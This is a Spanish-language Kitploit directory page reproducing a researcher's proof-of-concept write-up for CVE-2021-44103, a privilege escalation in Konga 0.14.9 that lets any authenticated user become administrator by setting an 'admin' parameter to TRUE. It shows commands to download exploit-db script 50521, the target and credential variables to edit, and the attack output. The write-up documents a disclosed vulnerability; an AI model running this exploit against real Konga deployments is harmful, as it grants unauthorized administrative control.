Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-44103 | Kitploit
Herramientas/GitHubGitHub/paulotrindadec/cve-2021-44103
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónSeguridad de APIs
GitHubpaulotrindadec/cve-2021-44103

CVE-2021-44103

Ver Repositorio
3hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-44103

Una prueba de concepto para KONGA 0.14.9 - Escalada de privilegios.

Intro

El 16 de noviembre de 2021, Fabrício Salomão y yo encontramos una vulnerabilidad en las puertas de enlace de la API de Konga, que permitía a cualquier usuario autenticado convertirse en administrador.

Informe de vulnerabilidad

Producto: KONGA
Modelo: 0.14.9
Vulnerabilidad: Escalada de privilegios
Impacto: Acceso total de administrador (escalada vertical de privilegios)
Autenticación: requerida
Autor del exploit: Fabricio Salomao / Paulo Trindade

PoC

A continuación, se creó un usuario normal llamado "usernormal" sin privilegios.

Crash

Crash

Mediante la solicitud que se muestra a continuación, se cambió el indicador "FALSE" en el parámetro "admin" a "TRUE".

Crash

Por lo tanto, se creó un exploit para nosotros: https://www.exploit-db.com/exploits/50521

Crash

Después de ejecutar el exploit, ¡la escalada de privilegios fue un éxito!

Resultado:

Crash

Ejecutando el exploit

root@kitploit:~
wget https://www.exploit-db.com/raw/50521 -O 50521.py

Edit 50521.py

Modify:

urlkonga = "http://www.example.com:1337/" # change to your konga address
identifier = "usernormalkonga"            # change user
password = "changeme"                     # change password

Execute:

python 50521.py

[+] Attack
[+] Token eyJhbGciOiJIUzI1NiJ9.MTA.JFmJ0Vd3z5oeOTokSL0qfPZSOJmnZKEjZVzCJs_AM-U
[+] Change Normal User to Admin
[+] Success

ENLACES

http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html

https://www.exploit-db.com/exploits/50521

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44103

https://github.com/advisories/GHSA-f2mp-8fgg-7465

https://security.snyk.io/vuln/SNYK-JS-KONGA-2434821

https://twitter.com/CVEnew/status/1508455166885961732

https://twitter.com/search?q=CVE-2021-44103&src=typed_query

Descargar herramienta